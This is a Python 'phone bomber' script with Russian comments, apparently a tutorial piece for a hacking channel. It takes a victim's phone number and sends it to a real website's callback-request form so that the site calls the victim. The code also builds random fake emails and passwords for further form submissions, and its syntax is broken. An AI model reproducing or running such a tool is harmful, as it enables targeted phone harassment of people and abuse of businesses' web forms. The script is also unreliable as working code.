#Суть бомбера в том, что мы оставляем заявки на разных сайтах с просьбой перезвонить нам на номер.

# Импортируем библиотеки
import requests, datetime, random, transliterate
from colorama import Fore

# Переменная с текущей датой
truedata = str(datetime.datetime.today())
truedata = truedata.split(' ')[0]

# Переменные с именами и фамилиями
names = ('Алексей', 'Иван', 'Константин', 'Петр', 'Семен', 'Матвей', 'Станислав', 'Владимир', 'Олег', 'Сергей')
surnames = (
'Иванов', 'Смирнов', 'Кузнецов', 'Попов', 'Васильев', 'Петров', 'Соколов', 'Михайлов', 'Новиков', 'Фёдоров',
'Морозов', 'Волков')
patronymics = (
'Богданович', 'Маркович', 'Олегович', 'Глебович', 'Александрович', 'Дмитриевич', 'Егорович', 'Георгиевич',
'Львович', 'Кириллович')

# Переменные со случайными значениями
randomemail = transliterate.translit(random.choice(names), reversed=True) + transliterate.translit(random.choice(surnames), reversed=True) + '@gmail.com'
randompassword = transliterate.translit(random.choice(names), reversed=True) + transliterate.translit(random.choice(surnames), reversed=True)
randomtimezone = int(random.random() * 10)
randomzaim = int((random.random() * 10) + 10)
randomid6 = str(random.randint(1, 9)) + str(random.randint(1, 9)) + str(random.randint(1, 9)) + str(random.randint(1, 9)) + str(random.randint(1, 9))

# Переменная с той самой "просьбой" перезвонить нам
problem = 'Здравствуйте, у меня есть проблема'
#Главная функция с логотипом и отправкой запросов:

def main():
logo = r'''
____ ___ ___ __ __ ____ U _____ u ____
U | __")u / _"\ u / _"\ uU|' \/ '|uU | __")u\| ___"|/U | _"\ u
\| _ \/| / U |/ | / U |/ \| |\/| |/ \| _ \/ | _|" \| |_) |/
| |_) || \// |,-.| \// |,-.| | | | | |_) | | |___ | _ <
|____/ \___/(_/ \___/(_/ |_| |_| |____/ |_____| |_| \_\
_|| \\_ // // <<,-,,-. _|| \\_ << >> // \\_
(__) (__) (__) (__) (./ \.) (__) (__)(__) (__) (__) (__)

by FARBER for @cybersecs

3 of 3
'''

print(logo)

phoneNum = input('Номер телефона: ')
name = input('Имя: ')
#Опять же с целью экономии времени я разберу только один из запросов:

try:
# Запрос содержит имя, телефон и действие callme
requests.post('https://junker.kiev.ua/postmaster.php', data={'name': name, 'tel': phoneNum, 'action': 'callme'})
# Выводим сообщение о том что все прошло успешно
# Fore.GREEN значит что текст будет зеленым
print(Fore.GREEN + 'Вам позвонят, ждите!')
exception:
# Если появилась ошибка (ex), мы ее выедем
print(Fore.RED + '[-] Запрос не был отправлен!' + str(ex))
#В конце пишем:

print('Готово!')
# Запускаем нашу функцию отправки запросов
if __name__ == '__main__':
main()